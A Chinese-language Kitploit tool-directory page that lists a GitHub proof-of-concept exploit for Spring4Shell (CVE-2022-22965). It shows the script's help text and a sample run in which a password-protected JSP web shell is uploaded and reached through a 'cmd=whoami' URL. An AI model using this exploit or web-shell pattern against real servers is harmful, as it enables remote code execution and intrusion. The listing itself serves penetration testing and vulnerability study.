Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Spring4Shell-CVE-2022-22965-POC — 用户友好的 Spring4Shell POC | Kitploit
工具/GitHubGitHub/ajith737/spring4shell-cve-2022-22965-poc
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHubajith737/spring4shell-cve-2022-22965-poc

Spring4Shell-CVE-2022-22965-POC

用户友好的 Spring4Shell POC

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
3年前尚未审核

Spring4Shell-CVE-2022-22965-POC

root@kitploit:~
ghost㉿uchiha:~$ ./exploit.py --help                                     
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

options:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)

用法

root@kitploit:~
ghost㉿uchiha:~$ ./exploit.py http://url/
Shell 上传成功!
你的 Shell 位于:http://url/tomcatwar.jsp?pwd=evil&cmd=whoami

修改版自 https://github.com/BobTheShoplifter/Spring4Shell-POC

下载工具